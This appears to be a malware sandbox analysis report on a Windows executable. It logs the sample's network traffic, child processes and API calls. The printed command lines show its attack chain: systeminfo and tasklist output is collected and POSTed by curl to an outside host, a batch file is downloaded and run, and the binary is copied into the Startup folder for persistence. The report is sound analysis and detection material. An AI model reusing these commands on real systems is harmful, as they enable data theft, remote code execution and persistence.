2024-12-12 15:46:39 UTC	461	OUT	GET /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
2024-12-12 15:46:40 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:40 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49793	94.154.172.218	443	5464	C:\Windows\SysWOW64\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:46:42 UTC	543	OUT	POST /search/ HTTP/1.1 Host: peerhost59mj7i6macla65r.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80 Accept: / X-Reply: 1 X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865 X-Auth: 2F414C464F4E532D50432F616C666F6E732F32 X-Sec-Id: 1 Content-Length: 0 Content-Type: application/x-www-form-urlencoded
2024-12-12 15:46:43 UTC	191	IN	HTTP/1.1 200 OK Server: nginx/1.14.1 Date: Thu, 12 Dec 2024 15:46:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24
2024-12-12 15:46:43 UTC	12	IN	Data Raw: 32 0d 0a 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 20

Target ID:	0
Start time:	10:46:08
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x1e0000
File size:	920'064 bytes
MD5 hash:	5950611ED70F90B758610609E2AEE8E6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	10:46:08
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:46:08
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:46:09
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\systeminfo.exe
Wow64 process (32bit):	true
Commandline:	systeminfo
Imagebase:	0x9c0000
File size:	76'800 bytes
MD5 hash:	36CCB1FFAFD651F64A22B5DA0A1EA5C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:46:10
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1b0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:46:11
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:46:11
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:46:15
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:46:15
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:46:18
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:46:18
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:46:18
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:46:18
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:46:21
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:46:21
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:46:21
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:46:21
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:46:29
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Imagebase:	0x540000
File size:	920'064 bytes
MD5 hash:	5950611ED70F90B758610609E2AEE8E6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:46:30
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:46:30
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:46:30
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\systeminfo.exe
Wow64 process (32bit):	true
Commandline:	systeminfo
Imagebase:	0x9c0000
File size:	76'800 bytes
MD5 hash:	36CCB1FFAFD651F64A22B5DA0A1EA5C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:46:30
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1b0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:46:31
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:46:31
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:46:34
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:46:34
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:46:36
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:46:36
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:46:39
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:46:39
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	10:46:39
Start date:	12/12/2024
Path:	C:\Windows\SysWOW64\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Imagebase:	0xb10000
File size:	470'528 bytes
MD5 hash:	44E5BAEEE864F1E9EDBE3986246AB37A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:46:39
Start date:	12/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	1634
Total number of Limit Nodes:	39

Executed Functions

Function 001E42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001E430D

Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A

GetCurrentProcess.KERNEL32(?,0027CB64,00000000,?,?), ref: 001E4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 001E4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 001E4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 001E4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 001E4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 001E447B
GetSystemInfo.KERNEL32(?,?,?), ref: 001E44A0

Strings

GetNativeSystemInfo, xrefs: 001E4460
kernel32.dll, xrefs: 001E444F
|O, xrefs: 002236F8

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
Instruction ID: 40ba96c64887bf90ec0129cce916e0a8fa31405a4b87e500557d129ca31f99c1
Opcode Fuzzy Hash: 2016962d5d25a28e16aefe6a5c2ec9b8070ff448c1db60c4457af20be7f73880
Instruction Fuzzy Hash: 8BA1D661A1A7D0DFCB15CBB97C6C1A97FE47B26300B984AEDE04593B61F32445A4CB21

Function 0024D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

Part of subcall function 0024E199: GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A

FindFirstFileW.KERNELBASE(?,?), ref: 0024D420
DeleteFileW.KERNELBASE(?,?,?,?), ref: 0024D470
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0024D481
FindClose.KERNEL32(00000000), ref: 0024D498
FindClose.KERNEL32(00000000), ref: 0024D4A1

Strings

\*.*, xrefs: 0024D3F2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
Instruction ID: 3c56a6f3371eef96e0e2533653d40312eb770fa7ec04542dc226568f7a1db9c8
Opcode Fuzzy Hash: cf4f56ad4637520f417ce693e25b6275581d028e48a5062c943aefc253a0d950
Instruction Fuzzy Hash: 4A3181310187859FC304EF65D8958AFB7E8BEA1314F844A1DF4D593192EB30AA59CB63

Function 001E42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001E50AA,?,?,00000000,00000000), ref: 001E42C9
LoadResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235BE
SizeofResource.KERNEL32(?,00000000,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20), ref: 002235D3
LockResource.KERNEL32(001E50AA,?,?,001E50AA,?,?,00000000,00000000,?,?,?,?,?,?,001E4F20,?), ref: 002235E6

Strings

SCRIPT, xrefs: 001E42BF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
Instruction ID: 5f7371a41e0e8d7a6cd1e6a4942e40c3ce86791075182c2deea99f7bedb5deb8
Opcode Fuzzy Hash: 7960cbb65632a4c64f8ce2e7049ca3960c04a080ebb9d9f993afd12f0e23d271
Instruction Fuzzy Hash: 46118E70200702BFD7218FA6EC48F6B7BB9EBC5B51F24816DF946D6260DB71DC508620

Function 00222BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001E2B6B

Part of subcall function 001E3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002B1418,?,001E2E7F,?,?,?,00000000), ref: 001E3A78

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,002A2224), ref: 00222C10
ShellExecuteW.SHELL32(00000000,?,?,002A2224), ref: 00222C17

Strings

runas, xrefs: 00222C0B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 326791158f899dd9978563d4bc6f2c6542be5086aa50e20d4e2f7b1e49c4f699
Instruction ID: cd687bf0232331c3673d09c29dd10042a3c8aa14e7d211bd40315c32e315822d
Opcode Fuzzy Hash: 326791158f899dd9978563d4bc6f2c6542be5086aa50e20d4e2f7b1e49c4f699
Instruction Fuzzy Hash: F1110A31104BC1ABC714FF62E869DAEB7A8ABB1340F54042CF056170A2DF3189598712

Function 0024DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00225222), ref: 0024DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0024DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0024DBEE
FindClose.KERNEL32(00000000), ref: 0024DBFA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
